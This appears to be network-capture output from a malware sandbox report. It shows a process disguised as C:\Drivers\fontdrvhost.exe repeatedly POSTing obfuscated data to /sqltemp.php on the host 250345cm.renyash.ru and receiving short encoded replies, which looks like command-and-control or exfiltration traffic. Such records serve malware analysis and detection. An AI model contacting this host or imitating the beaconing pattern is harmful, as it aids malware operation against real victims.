                                                                                                                                                                                            Jan 1, 2025 14:52:25.230000019 CET1012OUTData Raw: 56 50 5f 54 54 50 54 5d 58 56 52 59 56 5b 59 56 5b 5b 54 59 55 5d 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VP_TTPT]XVRYV[YV[[TYU]P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&?\"<%$>,=V7;?'S=-##T3X+A1/'V-:&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:52:25.328108072 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            25192.168.2.449772104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:25.329962015 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:25.683173895 CET1852OUTData Raw: 56 57 5f 53 54 5c 51 55 58 56 52 59 56 5c 59 5e 5b 5c 54 5c 55 5a 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VW_ST\QUXVRYV\Y^[\T\UZPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z09X 9_'';U 0X?8>X [ "0<8)A%'R:&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:52:25.802619934 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:26.072232962 CET951INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:26 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=he7EuNINwZPcruON5F2WNbwkGSUNZgAVUN48PknnoRLXJ17iyFf5yxCti3bTjqat%2BfREyQPp8ebKjIkSUFksSqtAd63Q6XRGB8201UzMHYWHBHBBB9IWw2CcZnPX6siiS61tAvv%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd60ffc8727a-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4362&min_rtt=2052&rtt_var=5390&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=71101&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 25 51 2a 5b 32 13 25 54 30 5c 3f 3d 3b 55 25 2d 29 00 29 3b 26 58 24 00 0e 02 2a 3a 3f 59 20 2c 0c 06 25 5e 33 02 21 2d 37 58 25 34 2b 59 05 1c 23 1d 36 2f 2c 1c 29 2d 0e 04 32 3f 03 5a 27 00 34 59 3c 16 30 11 37 28 2f 5f 24 3d 30 11 29 5c 3c 56 24 2f 2b 14 2d 3c 21 1d 27 10 2c 54 00 11 26 1d 24 08 24 16 34 0e 30 59 22 31 3d 13 32 0a 3e 57 24 3c 09 53 37 07 25 05 26 22 2b 10 23 33 31 07 25 2b 31 10 23 04 37 52 3e 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98%Q*[2%T0\?=;U%-));&X$*:?Y ,%^3!-7X%4+Y#6/,)-2?Z'4Y<07(/_$=0)\<V$/+-<!',T&$$40Y"1=2>W$<S7%&"+#31%+1#7R>%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            26192.168.2.449773104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:25.448699951 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:25.792789936 CET1012OUTData Raw: 56 52 5f 55 51 5a 51 50 58 56 52 59 56 5f 59 50 5b 53 54 51 55 59 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VR_UQZQPXVRYV_YP[STQUYP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._3,942$=7E,:R!>8+0*>8Z#"[+$,?:&Y.,Y-9
                                                                                                                                                                                            Jan 1, 2025 14:52:25.921072006 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:26.185583115 CET799INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:26 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ivNt1JDBXZuunOjOIrPqEnZ1LVIKijQEmEBRkOWUKKlPBXTYVRdX5xC7DcDcxymuuGh8gtRaJbWU5XlfKMjhhvQUBqJqyVn3USBOjPnyFtl10zZZhL8TBOehhvXI9XCwyGzs39fi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd61baf2726b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3199&min_rtt=2002&rtt_var=3145&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=126090&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            27192.168.2.449774104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:26.307028055 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:26.651985884 CET1012OUTData Raw: 53 50 5a 53 54 5d 54 51 58 56 52 59 56 51 59 50 5b 58 54 5c 55 5b 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SPZST]TQXVRYVQYP[XT\U[PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&<:#Y"%.#B,9: (Y<'(-<Y 4++*%?V.*&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:26.779622078 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:27.036976099 CET805INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:26 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TK9DYTExPU5n3mAbF1lh%2BNq5MtHANUm4%2Bv52t4HupZEzJItHwEQq3XFtyMArGx622evT3r2lVutGApw2gnbiH%2BEdtgRKyaaoHmZuE44Fzn10T6o6C649k9AiXLoycA17KtzHdQYT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd67097632dc-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3241&min_rtt=1927&rtt_var=3351&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=117335&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            28192.168.2.449775104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:27.166116953 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:27.511488914 CET1012OUTData Raw: 56 5f 5a 56 51 5d 54 5d 58 56 52 59 56 58 59 57 5b 59 54 58 55 59 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V_ZVQ]T]XVRYVXYW[YTXUYPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'/5["?%.+E;*= 3(4=-4] <])A&+,:&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:27.641555071 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:27.899215937 CET802INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:27 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1IQ6pa1oAMrDWJOV4%2F2vndh6X2nfkPKE8hZm0KAXViq2%2BfsVj7VFN7NZ3UGR%2BewJuYvyaVo07mX%2FHzrSlBvf2wMmfgVU9zz2xrZMdwGGhzWfDSBuLc9Y5KkepyXcSsR1jG3iZaGm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd6c78aa41d5-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6658&min_rtt=1769&rtt_var=10442&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=35711&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X
                                                                                                                                                                                            Jan 1, 2025 14:52:27.991584063 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            29192.168.2.449776104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:28.120573044 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:28.480319023 CET1012OUTData Raw: 56 54 5f 54 54 5a 51 52 58 56 52 59 56 5c 59 54 5b 52 54 58 55 5e 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VT_TTZQRXVRYV\YT[RTXU^PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$&7>'-7D8!S 0X+94=-+4<;9@%Y?W9&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:52:28.564743996 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:28.839664936 CET805INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:28 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hg5Miv9koOI6Pe0jN4jUQATT8V53TJkzbmNjVW%2BTIKgCnPlCWvo%2BUrUKstIyJWuImS0U51tK8eCojQR%2BoxkQA2wU8MXn4zzIJmjVhQTRKBzaBK0gg02nGyWY0wqTQrqPpyIWoamY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd724b044229-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2708&min_rtt=1759&rtt_var=2559&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=156032&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            30192.168.2.449777104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:28.966810942 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:29.323834896 CET1012OUTData Raw: 56 51 5a 57 54 5b 54 50 58 56 52 59 56 50 59 50 5b 53 54 5d 55 5e 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQZWT[TPXVRYVPYP[ST]U^PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3)\ /=_$;B/!=#<_'U);4$+(:%+S.*&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:29.449487925 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:29.710602045 CET818INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:29 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZhYsnIl%2FNYgH%2B8kBGrF1WSSLDrD3vMQYSTvq5Sj6FOg356r8NUkVlpD72NMSiVGRP%2FG%2BLRhNpsLps2oq0%2BtgaegMs5IeYF7D6B1jloH6qoVChqn76S%2B%2Bxf%2Bv%2FFAlxGOAqGm4i%2FRv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd77bbad4397-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3301&min_rtt=1729&rtt_var=3793&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=102040&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            31192.168.2.449778104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:29.837430000 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:30.183309078 CET1012OUTData Raw: 53 50 5f 54 54 51 54 5d 58 56 52 59 56 58 59 53 5b 5b 54 5e 55 5f 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SP_TTQT]XVRYVXYS[[T^U_PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3?>4?-0'B8927$(_'R)' !,?(61?7U9&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:30.291994095 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:30.564135075 CET814INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:30 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NE%2Fca4TwwbuGlifu6x3akrp4g01%2B4oRj2Pg3MDmPZbAnoksiFYgrq%2FubuXusl39wFLFX%2FWhwpwoEq2dfgg2wWM0%2Fi0w7giUqIqAR%2FB0F4qT7LsE7g%2FoQHJoWdepsetPZx%2B7Z3S9f"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd7d0d150f3a-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4761&min_rtt=1641&rtt_var=6855&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=54883&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            32192.168.2.449779104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:30.691910028 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:31.042700052 CET1012OUTData Raw: 53 55 5f 57 54 5f 54 54 58 56 52 59 56 51 59 51 5b 5a 54 5b 55 59 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SU_WT_TTXVRYVQYQ[ZT[UYPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'?7/*'>'C.*1R4$_(V).<[7?]<]9D%Y<:&Y.,Y-


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            33192.168.2.449780104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:31.102561951 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:31.448810101 CET1852OUTData Raw: 53 55 5a 56 54 59 54 52 58 56 52 59 56 50 59 5e 5b 53 54 51 55 5b 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SUZVTYTRXVRYVPY^[STQU[P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z0?-7.0-<,=R =$X*)). 2(9B&;W9:&Y.,Y-
